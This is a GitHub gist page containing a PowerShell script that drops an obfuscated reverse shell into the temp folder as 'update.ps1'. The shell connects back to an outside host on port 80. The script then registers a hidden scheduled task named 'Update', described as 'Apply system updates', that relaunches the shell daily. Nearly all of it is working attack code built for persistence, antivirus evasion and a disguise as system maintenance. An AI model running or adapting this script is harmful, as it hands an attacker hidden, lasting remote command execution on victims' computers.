Skip to content

Instantly share code, notes, and snippets.

@jdgregson
Created March 25, 2022 08:21
Show Gist options
  • Save jdgregson/e044d97fcdc1c526fabd4b6b2e0ac850 to your computer and use it in GitHub Desktop.
Save jdgregson/e044d97fcdc1c526fabd4b6b2e0ac850 to your computer and use it in GitHub Desktop.
Drops a reverse shell and launches it via a scheduled task one minute later and then every 24 hours. Shell portion modified from: https://github.com/tihanyin/PSSW100AVB/blob/main/ReverseShell_2022_03.ps1
# reverse shell hostname/ip
$h = "research.jdgregson.com"
# reverse shell port
$p = 80
# drop the shell
$shell = '$J=New-Object System.Net.Sockets.TCPClient("HOST",PORT);$SS=$J.GetStream();[byte[]]$OO=0..((2-shl(3*5))-1)|%{0};$OO=([text.encoding]::UTF8).GetBytes((Get-Location).Path+"> ");$SS.Write($OO,0,$OO.Length);while(($A=$SS.Read($OO,0,$OO.Length)) -ne 0){;$DD=(New-Object System.Text.UTF8Encoding).GetString($OO,0,$A);$GG=(i`eX $DD 2>&1|Out-String);$H=$GG+(pwd).Path+"> ";$L=([text.encoding]::UTF8).GetBytes($H);$SS.Write($L,0,$L.Length);$SS.Flush()};$JJ.Close()' -replace "HOST",$h -replace "PORT",$p
$script = "$env:temp\update.ps1"
$shell > $script
# schedule shell to run in one minute and then every 24 hours after that
$ta = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoLogo -WindowStyle Hidden -File $script"
$tt = New-ScheduledTaskTrigger -Daily -At "$((get-date).AddMinutes(1).ToString("H:mm:ss tt"))"
Register-ScheduledTask -TaskName "Update" -Action $ta -Trigger $tt -Description "Apply system updates"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment